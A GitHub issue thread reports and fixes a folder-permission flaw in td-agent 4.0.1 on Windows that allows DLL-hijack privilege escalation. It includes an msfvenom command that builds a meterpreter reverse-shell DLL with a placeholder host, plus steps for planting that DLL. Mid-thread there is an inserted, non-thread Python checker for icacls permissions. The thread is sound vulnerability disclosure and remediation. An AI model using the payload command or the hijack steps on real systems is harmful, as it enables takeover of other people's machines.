Possible Vulnerability #3201

Closed
zubrahzz opened this issue Dec 11, 2020 · 7 comments
Comments

@zubrahzz

POC.docx
Describe the bug
Inappropriate folder permissions, possible escalation of privileges on Windows

To Reproduce
Download URL:
http://packages.treasuredata.com.s3.amazonaws.com/4/windows/td-agent-4.0.1-x64.msi
Vulnerable Path:
C:\opt\td-agent\bin

Steps in reproducing the exploit:
Creating a DLL containing a reverse shell with the specific name that ruby.exe will search:
msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=IPADRRESS LPORT=PORT > CRYPTBASE.dll
Setting up MSF console to listen for connection.
Copying the DLL file that we created to “C:\opt\td-agent\bin” using a limited account:
Normally, a limited user might not have the possibility of restarting the service.
A potential attacker can wait for the service to be restarted or he can restart the machine from command line; when the service restarts, it will trigger the DLL and get NT Authority.

Expected behavior
N/A

Your Environment
Windows10

If you hit the problem with older fluentd version, try latest version first.

Your Configuration

Default

Your Error Log

No errors.
Additional context

Please add an appropriate contact method to submit possible vulnerabilities and POC's.

@kenhys kenhys added the bug label Dec 18, 2020
@kenhys kenhys self-assigned this Dec 18, 2020
@kenhys
Contributor

kenhys commented Dec 25, 2020

Yes,

It seems that inappropriate permission is set.

PS C:\> icacls.exe .\opt\td-agent\bin\
.\opt\td-agent\bin\ BUILTIN\Administrators:(I)(OI)(CI)(F)
                    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                    BUILTIN\Users:(I)(OI)(CI)(RX)
                    NT AUTHORITY\Authenticated Users:(I)(M)
                    NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

@kenhys
Contributor

kenhys commented Dec 25, 2020

note: In contrast to Program Files.

C:\> icacls.exe 'C:\Program Files\'
C:\Program Files\ NT SERVICE\TrustedInstaller:(F)
                  NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                  NT AUTHORITY\SYSTEM:(M)
                  NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                  BUILTIN\Administrators:(M)
                  BUILTIN\Administrators:(OI)(CI)(IO)(F)
                  BUILTIN\Users:(RX)
                  BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
                  CREATOR OWNER:(OI)(CI)(IO)(F)
                  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
                  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)(GR,GE)
                  APPLICATION PACKAGE AUTHORITY\制限されたすべてのアプリケーション パッケージ:(RX)
                  APPLICATION PACKAGE AUTHORITY\制限されたすべてのアプリケーション パッケージ:(OI)(CI)(IO)(GR,GE)
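The two `icacls` listings above (the td-agent bin directory and, for contrast, Program Files) are a natural input for an audit check. As an added example, not from this thread or the td-agent project, the following Python parses `icacls` text output and flags ACEs that grant write-capable rights to low-privilege principals; the principal list and the set of rights treated as write-capable are my assumptions, and the sample output is the thread's own (Program Files abbreviated).

```python
import re

# Principals an unprivileged local user belongs to (constructed list).
LOW_PRIV = {"BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users", "Everyone"}
# icacls rights that allow creating, replacing or deleting files in a folder.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "WDAC", "WO", "GA", "GW"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
ACE_RE = re.compile(r"^(?P<who>[^()]+?):(?P<flags>(?:\([^)]*\))+)$")

# icacls output as posted in this thread (td-agent 4.0.1 bin dir, Program Files excerpt).
TD_AGENT_BIN_PATH = ".\\opt\\td-agent\\bin\\"
TD_AGENT_BIN = r""".\opt\td-agent\bin\ BUILTIN\Administrators:(I)(OI)(CI)(F)
                    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                    BUILTIN\Users:(I)(OI)(CI)(RX)
                    NT AUTHORITY\Authenticated Users:(I)(M)
                    NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)"""
PROGRAM_FILES_PATH = "C:\\Program Files\\"
PROGRAM_FILES = r"""C:\Program Files\ NT SERVICE\TrustedInstaller:(F)
                  BUILTIN\Users:(RX)
                  BUILTIN\Users:(OI)(CI)(IO)(GR,GE)"""

def parse_icacls(output, path):
    """Return [(principal, [flags])]; icacls puts the first ACE on the path line."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if m:
            aces.append((m.group("who").strip(),
                         re.findall(r"\(([^)]*)\)", m.group("flags"))))
    return aces

def writable_by_low_priv(output, path):
    """Return (principal, inherit_only, rights) for ACEs that let a low-privilege
    principal write; inherit_only ACEs apply to files created inside the folder."""
    findings = []
    for who, flags in parse_icacls(output, path):
        if who not in LOW_PRIV or "DENY" in flags:
            continue
        rights = set()
        for f in flags:
            if f not in INHERIT_FLAGS:
                rights.update(f.split(","))  # e.g. "GR,GE" lists several rights
        hits = sorted(rights & WRITE_RIGHTS)
        if hits:
            findings.append((who, "IO" in flags, hits))
    return findings
```

Run against the td-agent listing it reports both Authenticated Users entries (the `(M)` on the folder itself and the inherit-only one for new files); against Program Files it reports nothing, because Users only hold RX and GR,GE.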

@kenhys
Contributor

kenhys commented Dec 25, 2020

We need to fix this in the wixtoolset source layer.

ref. https://github.com/fluent-plugins-nursery/td-agent-builder/blob/master/td-agent/msi/source.wxs

@cosmo0920
Contributor

td-agent 4 fix is here:
fluent/fluent-package-builder#247

@kenhys kenhys added the windows label Dec 25, 2020
@kenhys
Contributor

kenhys commented Jan 20, 2021

I'll close this issue when td-agent 4.1.0 is released.

FYI: fluent/fluent-package-builder#248

@kenhys
Contributor

kenhys commented Mar 18, 2021

https://td-agent-package-browser.herokuapp.com/4/windows
4.1.0 has been released.

@kenhys kenhys closed this as completed Mar 18, 2021